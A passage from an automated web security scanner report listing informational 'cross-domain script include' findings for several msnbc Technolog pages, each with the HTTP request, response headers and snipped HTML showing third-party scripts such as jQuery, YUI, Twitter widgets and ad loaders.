ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.346. http://technolog.msnbc.redacted/iphone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /iphone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /iphone HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:33:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129183

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.347. http://technolog.msnbc.redacted/itunes

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /itunes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /itunes HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:47:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136747

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.348. http://technolog.msnbc.redacted/justin-bieber

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /justin-bieber

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /justin-bieber HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=279
Date: Sun, 30 Jan 2011 02:50:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135281

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.349. http://technolog.msnbc.redacted/kinect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /kinect

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /kinect HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=273
Date: Sun, 30 Jan 2011 02:39:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157233

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5807115" class="inlineCode photo_align_block" data-contentid="5807115"><script type='text/javascript' src='http://ww2.KKTV.com/global/video/videoplayer.js?rnd=972561;hostDomain=ww2.KKTV.com;playerWidth=640;playerHeight=480;isShowIcon=true;clipId=5447758;flvUri=;partnerclipid=;adTag=News;advertisingZone=undefined;enableAds=false;landingPage=http%253A%252F%252Fwww.kktv.com%252Fvideo%252F;islandingPageoverride=false;playerType=MINI_EMBEDDEDscript'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5774095" class="inlineCode photo_align_right" data-contentid="5774095"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.350. http://technolog.msnbc.redacted/mark-zuckerberg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /mark-zuckerberg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mark-zuckerberg HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=293
Date: Sun, 30 Jan 2011 02:51:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121914

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.351. http://technolog.msnbc.redacted/meme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /meme

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /meme HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
